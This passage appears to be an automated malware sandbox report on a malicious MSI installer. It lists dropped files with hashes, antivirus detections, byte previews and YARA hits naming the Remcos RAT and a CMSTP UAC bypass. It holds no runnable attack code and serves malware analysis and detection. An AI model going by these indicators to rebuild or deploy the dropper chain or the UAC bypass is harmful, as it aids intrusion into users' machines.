                                                                                                            Preview:.<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <noInheritable></noInheritable>.. <assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>.. <file name="msvcr80.dll" hash="0a38b652c9d03caab803c6b2505fa301e345bab2" hashalg="SHA1"><asmv2:hash xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#"><dsig:Transforms><dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity"></dsig:Transform></dsig:Transforms><dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"></dsig:DigestMethod><dsig:DigestValue>TM0VvywbHVQayIOw9CSX6M7WpaM=</dsig:DigestValue></asmv2:hash></file>.. <file name="msvcp80.dll" hash="678bf3da5d1987bb88fd47c4801ecb41f51366ef" hashalg="SHA1"><asmv2:hash xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xm
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (504), with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2372
                                                                                                            Entropy (8bit):5.379862999788816
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:3SlK+5g4DJO09kkKBhZzY09kkKeIzl09kkKzzP09kkKXzY:CltFUXkcLEXkhIRXkm7Xk+8
                                                                                                            MD5:F1BB778577CFB1E45ADFBB2EAAAD7F58
                                                                                                            SHA1:171B0121B165B701482F96B02E7ADFFD6C799FCE
                                                                                                            SHA-256:53B6CDAB4A829674082048606A65111A2D6AC3A1B2BCFB8BE34D8296590D42DE
                                                                                                            SHA-512:4D125D773A3DD6A0CB755B69053F7D305DE03C3FA9854A87A9ECF504C23C8C37BA3FE533B0CD45762B340E6B8065D33BF7280A76376077FB734EAE52F950249D
                                                                                                            Malicious:false
                                                                                                            Preview:.<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <noInheritable></noInheritable>.. <assemblyIdentity type="win32" name="Microsoft.VC80.MFC" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>.. <file name="mfc80.dll" hash="46fc9af0bb795fec574d619bfd84f019f56debb4" hashalg="SHA1"><asmv2:hash xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#"><dsig:Transforms><dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity"></dsig:Transform></dsig:Transforms><dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"></dsig:DigestMethod><dsig:DigestValue>JMgFAKGMt+YOD/s362I/Ku+VEqs=</dsig:DigestValue></asmv2:hash></file>.. <file name="mfc80u.dll" hash="1d3d4e3c0689295a042c2834f2336a76ebaa9e4f" hashalg="SHA1"><asmv2:hash xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1237
                                                                                                            Entropy (8bit):5.33286502858899
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:2dtMEDJ/eiNK+EItg4NnZsstwsED4lla117+7W28mcP:ciEDJdK+/g4BgCCw76l
                                                                                                            MD5:526C8811D11C65F7EBCA8D5F38421188
                                                                                                            SHA1:F964CC250E326101F636A6293ECC710761EF7CCF
                                                                                                            SHA-256:571AF1EA18CA3F68C321975E7B1A1146B00DFA9349D5711A30C7CF89045A6A1A
                                                                                                            SHA-512:42E328781BFFF24112D6D9C2A84CF2DE95DC9767B8B4DD8B6DE099722C236350401E483C2710196DD7092C5B9A03F65A6938DD680E5A2CBBC288A6344F950929
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>.. Copyright . 1981-2001 Microsoft Corporation -->..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <noInheritable/>.. <assemblyIdentity type="win32" name="Microsoft.VC80.MFCLOC" version="8.0.50608.0" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"/>.. <file name="mfc80CHS.dll" hash="754165cac2d8fce9978dafeb313cea44852c9bf4" hashalg="SHA1"/>.. <file name="mfc80CHT.dll" hash="9167a79af2333f96551b12db36100f24801c4e98" hashalg="SHA1"/>.. <file name="mfc80DEU.dll" hash="72017b690322656f574718d51bc926ace81808f2" hashalg="SHA1"/>.. <file name="mfc80ENU.dll" hash="fb919708d073d2fa2174d3a328457c3be36cd4b5" hashalg="SHA1"/>.. <file name="mfc80ESP.dll" hash="b4536e19ba2f27ed4eb4d714a6f4b7fc69b5fb99" hashalg="SHA1"/>.. <file name="mfc80FRA.dll" hash="9157b1ab7a8c2b56f562f962370c75bbe726e8c6" hashalg="SHA1"/>.. <file name="mfc80ITA.dll" hash="5bcbbcf7fcc05361078ae12cc803
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\Updwork.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):372224
                                                                                                            Entropy (8bit):7.7008720235421775
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:HmkM9O5geNqoeWzPKclTBjAadj2BnEMbFmWuxTrA3a0UJYLuO5eJzm6LR6KrI3:9M9O5geNMBclTNAad6BnRm95AK1JY6a1
                                                                                                            MD5:3CA940E27E87443F7891D39536650F9B
                                                                                                            SHA1:2603FF220C43F13591A51ABB0CF339AECB758207
                                                                                                            SHA-256:A91F13AECE1EA7EBE326F0E340BDA9D00613D3365CD81B7F138A4C9446FFBD38
                                                                                                            SHA-512:0C0E04CBB8247F6DFE0790D1C3453596E3CB5F5FF0D2C3BC4E01FB38AD8E042322130072263C135C5637A745EF70AC68487BDADE3510990CE8F609CAD46566EE
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 46%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: LauncherPred8.3.389 stablesetup.msi, Detection: malicious, Browse
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .T...........#.....4..........`........P.....b.........................0............... ......................................0..X.................... ............................... .......................................................text....3.......4..................`.P`.data...\....P.......8..............@.0..rdata..@J...`...L...:..............@.`@.eh_fram *.......,..................@.0@.bss....0.............................`..edata..............................@.0@.idata..............................@.0..CRT................................@.0..tls.... .... ......................@.0..rsrc...X....0......................@.0..reloc....... ......................@.0B........................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                            Category:dropped
                                                                                                            Size (bytes):506816
                                                                                                            Entropy (8bit):7.443415941343508
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:n7eZ+haXoavdfm10f4MS1djcX6Sc+B/b+XdNUaMkfxnMfJYLuO1CJzy6LR6KrI1O:78+haL5miiB8c+BEUaMuGJY64wzRprB
                                                                                                            MD5:253C52411B256E4AF301CBA58DCB6CEF
                                                                                                            SHA1:F21252C959B9EB47CD210F41B997CF598612D7C9
                                                                                                            SHA-256:7D57B704DD881413E7EE2EFFB3D85BDFFF1E208B0F3F745419E640930D9D339D
                                                                                                            SHA-512:40DE728EDAE55F97AC9459CF78BBC31B38E8B59BDB7A74FBD9E09D7EFD2A81B1DC5FD8011007C66EFB58E850F1C57D099EC340AECD62911D6AEBF2E70D1275D0
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 37%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F..v...F...@...F.Rich..F.........................PE..L...)..\.................d...|.......2............@..........................0............@.................................<........... ............................................................................................................text....b.......d.................. ..`.rdata..\............h..............@..@.data....U...........|..............@....ndata...................................rsrc... ...........................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PNG image data, 535 x 323, 8-bit/color RGBA, non-interlaced
                                                                                                            Category:dropped
                                                                                                            Size (bytes):898642
                                                                                                            Entropy (8bit):7.939726917918056
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:huxSUG0FCq7vlCaw416/GCvEowni/F9jXR54:MRJFCq7vl6zdj2
                                                                                                            MD5:5124236FD955464317FBB1F344A1D2F2
                                                                                                            SHA1:FE3A91E252F1DC3C3B4980ADE7157369EA6F5097
                                                                                                            SHA-256:ED1389002CDF96C9B54DE35B6E972166EE3296D628943FD594A383E674C5CBA6
                                                                                                            SHA-512:2B2AC23244B16F936EF9A4049586F58C809FCC4391A56390CC5DB2E8D96140001E0B977680ED1D8B0AB9C410E865A880209E22ADD8D42E563DC40BC91236B252
                                                                                                            Malicious:false
                                                                                                            Preview:.PNG........IHDR.......C.......,4....sRGB.........bKGD..............pHYs...9...9...F....tIME.....8..v0j....iTXtComment.....Created with GIMPd.e... .IDATx..y..Gy...}M.fF..iY.!.........!.$...9...6$\.4....bgm.`...N.......,...X..e.l.#.4.9.~..?.....o..3:...?...y...W.......c../..+..r.\+..r.\....G~...7.....k.......2.B......`q...8.5....7K.......L..w#qa... .c..D......tH. .r..%.~.<..9K..g[.....x./...d.W`an..........k....y.g@...B....0..>.[.......J!.)..<".0.1!BC...L....E.].DtH..":.K..&"tuK."....&B.PD...=NZ.q&:.vXE[.E...{t.?A../.Kzx....d.P.".9..B....*;.D.#%..##."#...MF.../N.~m.W{........{.......>d.<....l.7..(......r.+{..2d|.].....ON.{..\.....b.OV.....+.8.....M4B .@U.s..XR.8k.O..xz....FkK...=.l..r_......:u...W.A.B.......0...q.ym.B6..&...FC.h....IO.N$P.<.u..q.E......H-.S..l.,13...8]B..|...{j....I6...r0...u..-.yZh..X/`@..x..A.Te.K..>.tX9.]...<..".B.)..eY..y. @UUTE..^vA..h$3......e..t...^4.F1.......E...J..`..bth."Z.#......G..........T.=`!.....!...T..
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1088536
                                                                                                            Entropy (8bit):7.695859208984458
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:teHbKKorOvzEelPREFDH8NJxZyv3jg5QBH8:teHbLFeHKO8F
                                                                                                            MD5:52677313E564E264BF1E26F01AA9D7FF
                                                                                                            SHA1:697C265EDCB4E8DD77EBB6D3B84C38BAEAA35357
                                                                                                            SHA-256:F7E2B0C26261ACD897DCD20AE79FDC8D7ED8A2846FB2A0CFC59350351A815EE1
                                                                                                            SHA-512:48544992FDB1A6BCEE18328A99D5FC4608A40F83DFD46C8852B97897A5368C9C63105B7D9958DC72E81C896E49E790B2C997E63DBAF75DFD18A2B5A2DF1F1057
                                                                                                            Malicious:false
                                                                                                            Preview:..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..rF.#...'..>/...5.......".......4..>#../....4.......4...F..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..:(...'...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..04...#...2...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF.:...!c...%...)..].../....#...-..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..]v..Cq..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1088536
                                                                                                            Entropy (8bit):7.695861087107369
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:KeHbKKorOvzEelPREFDH8NJxZyv3jg5QBH8:KeHbLFeHKO8F
                                                                                                            MD5:2320011D9D5A4734B8C9FE6C49E66A9B
                                                                                                            SHA1:AFD4AFD2266CFDAC7277B56A7E5383BA7686CF00
                                                                                                            SHA-256:0CED2906ECE4467FCCF1FE33BBED6AC485ECDD7B5EB20D1110339BADE4D95F28
                                                                                                            SHA-512:C040DCB2C0239D38E44BC0171736710B52FF6D53EC389550D114CFF23654BB12014A35938D472B3A583B2EB3586775938FC4746A9497C9B4525FABAC83849C5C
                                                                                                            Malicious:false
                                                                                                            Preview:..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..rF.#...'..>/...5.......".......4..>#../....4.......4...F..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..:(...'...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..04...#...2...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF.:...!c...%...)..].../....#...-..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..]v..Cq..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1088536
                                                                                                            Entropy (8bit):7.695861287428844
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:KeHbKKorOvzEelPREFDH8NJxZyv3jg5QBH8:KeHbLFeHKO8F
                                                                                                            MD5:E705389BBE7E610D9DC5FF691E8AB436
                                                                                                            SHA1:D0A8691B508B50FCE166A3432C716EF4BC6EA0B4
                                                                                                            SHA-256:422A0BE7A74F87B46D4A0B474E63C6CD98DA7950228A4E4A91C18617593A02E6
                                                                                                            SHA-512:924A157E14506DDEB9CA3191FEB8A96461848ED42A7FB4C4D0D7C831637F3D14A71307CDE8F9E55404F3700F01AF27E49B554592B482118E3030536ECD1C712E
                                                                                                            Malicious:false
                                                                                                            Preview:..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..rF.#...'..>/...5.......".......4..>#../....4.......4...F..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..:(...'...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..04...#...2...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF.:...!c...%...)..].../....#...-..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..]v..Cq..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF
                                                                                                            Process:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1088536
                                                                                                            Entropy (8bit):7.695861736865564
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:heHbKKorOvzEelPREFDH8NJxZyv3jg5QBH8:heHbLFeHKO8F
                                                                                                            MD5:F23AE3CCEE146D9731C242D9F705F501
                                                                                                            SHA1:527881C87333529B3D7914818834A41FF2E95E11
                                                                                                            SHA-256:2E82FAD1FA824A4DADDB17BD52EDB484EA1E046A19CB4C663FC7DC9B9868F2F2
                                                                                                            SHA-512:6954E697873E12CD8314FBAF4BBA1B62D955FF841E21794534BC943439875E7F28531183002F4D0CEBE4A47882A4FADE577E0BADCBC033990737B410F7CCDC3A
                                                                                                            Malicious:false
                                                                                                            Preview:..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..rF.#...'..>/...5.......".......4..>#../....4.......4...F..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..:(...'...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..04...#...2...#..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF.:...!c...%...)..].../....#...-..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..]v..Cq..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF..sF
                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):500736
                                                                                                            Entropy (8bit):6.582878001257931
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:w/7iPrcL3ArwhBq7Kjsn9iHGXg0lwGS9MNNhdFvPxps9gsAOZZAAXgc7S7ovz:w/uPq3AfK496Gw0lwGXN3pvs/ZA58vz
                                                                                                            MD5:16EC8B91B5461B1C810DCCDEAD6DE87F
                                                                                                            SHA1:FC9F07EE1F1BC5CC09F290B935BECC85223970E7
                                                                                                            SHA-256:C71E4D86B24B883F8DAF83CD2E3F689283185CF1DB4BDEFBEE213E50550CF968
                                                                                                            SHA-512:8EBD977810D7AD3AB051EC9F3BA18DB48FAE5FA2399ABD7E4C202C4551167B1394FACA42789AE0FEF636F90E1E29F69541009671BB45D13E4A8986D480889997
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\dsx, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\dsx, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\dsx, Author: unknown
                                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\dsx, Author: unknown
                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\dsx, Author: ditekSHen
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 89%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..- ..~ ..~ ..~.f$~3..~.f&~...~.f'~>..~).Q~!..~.Z.~"..~....:..~.......~.......~).F~9..~ ..~...~....D..~..*~!..~....!..~Rich ..~........PE..L....TCX.................r..........=I............@..........................@...........................................................J.......................;..@...8...........................x...@............................................text....p.......r.................. ..`.rdata...y.......z...v..............@..@.data...4]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....J.......L..................@..@.reloc...;.......<...P..............@..Bumlwqq... ... ......................@...........................................................................................................................................................................
                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Oct 26 05:02:16 2023, mtime=Fri Nov 29 23:25:22 2024, atime=Thu Oct 26 05:02:16 2023, length=20680, window=hide
                                                                                                            Category:dropped
                                                                                                            Size (bytes):992
                                                                                                            Entropy (8bit):5.015403643419632
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:8mWIVDolXlX0RCgKOZqCAQaIoo9pLfHfzqygm:8mtVDol1kRZqVqpfHfWyg
                                                                                                            MD5:BCEFB8D76142596CA8360D64C0C971F6
                                                                                                            SHA1:12F7C9A6F90D69F84086D60A159CB1BBE55E5D4F
                                                                                                            SHA-256:A63489EC53845D2575DE322D68D1AFAFB3BA07DF170A16A95358F2DBEDDD11C5
                                                                                                            SHA-512:63F431D1E6FD7E2C9D11EC128187269533FF18DF3724937CE958B3F0BDEC710F6F145680267C13D4EE917982CDA5301D203C1D96EDB51A4ABDBE6CBA9F3E501B
                                                                                                            Malicious:false
                                                                                                            Preview:L..................F.... .............X.B..........P........................:..DG..Yr?.D..U..k0.&...&.......$..S....p.B.B.....].B......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2~Y.............................^.A.p.p.D.a.t.a...B.P.1.....~Y&...Local.<......EW<2~Y&.....[.......................`.L.o.c.a.l.....N.1.....~Y....Temp..:......EW<2~Y......^......................w..T.e.m.p.....f.2..P..ZWH0 .EHttpSrv.exe..J......ZWH0~Y&.....P.........................E.H.t.t.p.S.r.v...e.x.e.......`...............-......._..............P.....C:\Users\user\AppData\Local\Temp\EHttpSrv.exe......\.E.H.t.t.p.S.r.v...e.x.e.........|....I.J.H..K..:...`.......X.......571345...........hT..CrF.f4... .^}......-...-$..hT..CrF.f4... .^}......-...-$.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):904880
                                                                                                            Entropy (8bit):6.130048225121867
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:CouStsPOf+YVeAVWiqnm5dVjPiqW95XZxByK0Dp:CouStsPOf+2nVWiqnm5dVjPiV95xyKGp
                                                                                                            MD5:4366CD6C5D795811822B9CCC3DF3EAB4
                                                                                                            SHA1:30F6050729B4C08B7657454CB79DD5A3D463C606
                                                                                                            SHA-256:55497A3ECED5D8D190400BCD1A4B43A304EBF74A0D6D098665474ED4B1B0E9DA
                                                                                                            SHA-512:4A56A2DA7DED16125C2795D5760C7C08A93362536C9212CFF3A31DBF6613CB3FCA436EFD77C256338F5134DA955BC7CCC564B4AF0C45AC0DFD645460B922A349
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 62%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........XboRXboRXboR..RYboR...RQboR...RIboR...REboRXbnR.aoR...RHboR...R.boR...RYboR...RYboR...RYboRRichXboR........................PE..L...K..K...........!..... ...p......j........0....@ ....................................................................g...|........`...<...........................;..............................(=..@............0..x............................text............ .................. ..`.rdata.......0.......0..............@..@.data....(...0...0...0..............@....rsrc....<...`...@...`..............@..@.reloc..^...........................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1093120
                                                                                                            Entropy (8bit):6.520969816214873
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:wsaHmJ//R12t2PdMvWxMIQ1zoKyK0ivyHCJKjswl/KY6oQy3AmgVk2YDFpR7m81H:KHmJ+tKtxMIQNmCcjswl/KYh/2YFnb
                                                                                                            MD5:686B224B4987C22B153FBB545FEE9657
                                                                                                            SHA1:684EE9F018FBB0BBF6FFA590F3782BA49D5D096C
                                                                                                            SHA-256:A2AC851F35066C2F13A7452B7A9A3FEE05BFB42907AE77A6B85B212A2227FC36
                                                                                                            SHA-512:44D65DB91CEEA351D2B6217EAA27358DBC2ED27C9A83D226B59AECB336A9252B60AEC5CE5E646706A2AF5631D5EE0F721231EC751E97E47BBBC32D5F40908875
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................R..............R.......R...............l......n......l......l......l......l.L....l......l......l.....Rich............PE..L...(YYJ...........!.....p...\.......U.............x.................................M....@..............................e......x.......................................................................@...............4............................text....n.......p.................. ..`.data....k.......J...t..............@....rsrc...............................@..@.reloc..V7.......8...v..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):632656
                                                                                                            Entropy (8bit):6.854474744694894
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:bxzh9hH5RVKTp0G+vjhr46CIw+0yZmGyYCj:bph9hHzVKOpXwymGyYo
                                                                                                            MD5:1169436EE42F860C7DB37A4692B38F0E
                                                                                                            SHA1:4CCD15BF2C1B1D541AC883B0F42497E8CED6A5A3
                                                                                                            SHA-256:9382AAED2DB19CD75A70E38964F06C63F19F63C9DFB5A33B0C2D445BB41B6E46
                                                                                                            SHA-512:E06064EB95A2AB9C3343672072F5B3F5983FC8EA9E5C92F79E50BA2E259D6D5FA8ED97170DEA6D0D032EA6C01E074EEFAAB850D28965C7522FB7E03D9C65EAE0
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L.........@................!......;.............d.......................Rich...................PE..L...yLYJ...........!.....0...p......+#.......@.....x......................................@..........................q...~..Pc..<....`..................P....p..P3...B...............................F..@............@...............................text....'.......0.................. ..`.rdata......@.......@..............@..@.data...Li.......P..................@....rsrc........`.......@..............@..@.reloc...7...p...@...P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:U:U
                                                                                                            MD5:7694F4A66316E53C8CDD9D9954BD611D
                                                                                                            SHA1:22EA1C649C82946AA6E479E1FFD321E4A318B1B0
